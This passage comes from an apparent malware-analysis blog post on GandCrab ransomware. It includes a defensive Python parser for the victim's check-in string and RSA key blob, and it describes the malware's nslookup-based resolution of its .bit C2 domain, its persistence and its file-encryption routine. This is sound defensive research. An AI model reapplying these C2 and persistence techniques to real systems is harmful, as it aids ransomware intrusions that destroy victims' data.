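As an added triage example (not code from the post), the check-in string and the pub_key blob shown above can be parsed offline with the Python below. The blob is a CryptoAPI PUBLICKEYBLOB: a PUBLICKEYSTRUC header (blob type, version, algorithm ID), then an RSAPUBKEY header (the "RSA1" magic, key length in bits, public exponent), then the little-endian modulus, which is the layout CryptoAPI uses when an RSA public key is exported and which CryptBinaryToStringA then base64-encodes. The pub_key, ransom_id and hdd values are copied from the GET string above; the ip and os values are constructed placeholders, and the query is split without URL-decoding because the base64 contains '+' and '/'.

```python
import base64
import struct

# pub_key copied from the check-in string shown in the post (split across
# lines for readability; the pieces concatenate to the original 368 characters).
PUB_KEY_B64 = (
    "BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoS"
    "EOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5Gr"
    "mWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeM"
    "DmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjB"
    "RAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1"
    "xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnN"
    "bY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O"
    "0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3zt"
    "N3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDm"
    "fwMCxFfW"
)

# Constructed check-in query: ransom_id, hdd and pub_key are the post's values;
# ip (RFC 5737 documentation address) and os are placeholders.
SAMPLE_QUERY = (
    "action=call&ip=198.51.100.7&os=PLACEHOLDER_OS&os_bit=x64"
    "&ransom_id=c9ed65de824663fc&hdd=C:FIXED_64317550592/50065174528"
    "&pub_key=" + PUB_KEY_B64
)

PUBLICKEYBLOB = 0x06        # PUBLICKEYSTRUC.bType for a public key blob
CALG_RSA_KEYX = 0x0000A400  # PUBLICKEYSTRUC.aiKeyAlg for RSA key exchange
RSA1_MAGIC = b"RSA1"        # RSAPUBKEY.magic for a public key


def split_query(query: str) -> dict:
    """Split key=value pairs on '&' without URL-decoding: the base64 blob uses
    '+' and '/', which urllib.parse.parse_qs would turn into spaces."""
    return dict(part.split("=", 1) for part in query.split("&"))


def parse_publickeyblob(blob: bytes) -> dict:
    """Parse PUBLICKEYSTRUC + RSAPUBKEY + modulus (all fields little-endian)."""
    if len(blob) < 20:
        raise ValueError("too short for a PUBLICKEYBLOB")
    b_type, b_version, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    magic = blob[8:12]
    bit_len, pub_exp = struct.unpack_from("<II", blob, 12)
    if b_type != PUBLICKEYBLOB or magic != RSA1_MAGIC:
        raise ValueError("not an RSA PUBLICKEYBLOB")
    modulus = blob[20:20 + bit_len // 8]
    if len(modulus) != bit_len // 8:
        raise ValueError("truncated modulus")
    return {
        "version": b_version,
        "alg_id": alg_id,
        "alg_is_rsa_keyx": alg_id == CALG_RSA_KEYX,
        "bit_length": bit_len,
        "public_exponent": pub_exp,
        "modulus_bytes": len(modulus),
        # CryptoAPI stores the modulus little-endian; its bit length should
        # equal the declared key size when the top byte has its high bit set.
        "modulus_bits": int.from_bytes(modulus, "little").bit_length(),
    }


def triage_checkin(query: str) -> dict:
    """Pull the victim identifier and the key parameters out of one check-in."""
    fields = split_query(query)
    key_info = parse_publickeyblob(base64.b64decode(fields["pub_key"]))
    return {"ransom_id": fields.get("ransom_id"),
            "hdd": fields.get("hdd"),
            "key": key_info}
```

What a responder learns from this: the key exchanged with the C2 is a 2048-bit RSA public key with the usual exponent 65537, generated on the victim host as the post says. Because the private half is what decrypts, the public blob in captured traffic is not by itself a recovery path; the priv_key parameter the caption above mentions, and a memory capture taken while the key pair is still in the process, are the artifacts worth preserving from an affected machine.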

GandCrab’s server is hosted on a .bit domain, and therefore it has to query a name server that supports this TLD. It does this by querying for the addresses of the following domains using the command:

nslookup [insert domain]  a.dnspod.com.

This command queries the a.dnspod.com name server, which supports the .bit TLD, for one of the domains below.


The NSlookup child process is opened through a pipe that was created. This is done so that a child process can directly affect the memory in the parent process, rather than transferring outputs manually back and forth. It is an interesting and useful technique. You can look at the following section of code for more details:

The ransomware now attempts to send data to the server, and if an error occurs or the server was not reachable, it continues this whole process in an infinite loop until it finds one that works, re-querying for client IP and running nslookup again and again with different IP outputs. Unless it connects with the server, it will run until it is closed manually.

As mentioned before, it will not continue to the encryption routine until it finds a server, which means it will enter in an infinite loop of IP requests:

Once it finds one of these, it continues by opening a thread that will start the main encryption functionality. However, before it begins, it opens another thread that creates a window and labels it as Firefox. The window is loaded with code that copies the malware to the temp directory and sets it up in the registry. This is actually one of the few parts of the malware that is not taken directly from plain text. The file name of the copy is a random series of letters generated by calling CryptGenRandom and using its output to index an array of letters.

The strange part about this function is not what it does, because it creates the persistence we had been waiting for, but rather why a window was created in the first place. As far as we can tell, there is no benefit to launching a window to perform these tasks. Maybe it was an experiment on the part of the author, but the intent remains unclear.

Encryption routine

As we established in the initialization section, the encryption algorithm used is RSA. Before we get to the encryption section, the code makes sure that it is not encrypting specific files that it considers protected. These are the following, hard-coded into the malware:


If it finds that the file name is on that list, it will skip it and continue to the next. It also skips looking into a folder if it is one of these key folders:

local app data
program data

When it passes these checks and gets to a specific file, it runs one final check on the extension against a list of acceptable file extensions to be encrypted:

If all checks pass, it proceeds to use the previously generated keys along with some salt and random number generated to encrypt the file and rename it with a .GDCB extension. The main encryption loop is a recursive function that will eventually make it to every file on the drive.


Malwarebytes users are protected at the delivery chain (exploit protection), but we also proactively stopped this ransomware before having seen it, thanks to our anti-ransomware engine:


It is interesting to see a new ransomware being distributed via exploit kits in what so far seems to be a few ongoing campaigns. The other interesting aspect is that two distinct exploit kits are delivering it, although it is unclear if the same actor is behind both campaigns and experimenting with different distribution channels.

Indicators of Compromise

Seamless gate: xn--80abmi5aecft.xn--p1acf

GrandSoft EK (IP)

GandCrab (packed)


GandCrab (unpacked)


The post GandCrab ransomware distributed by RIG and GrandSoft exploit kits appeared first on Malwarebytes Labs.


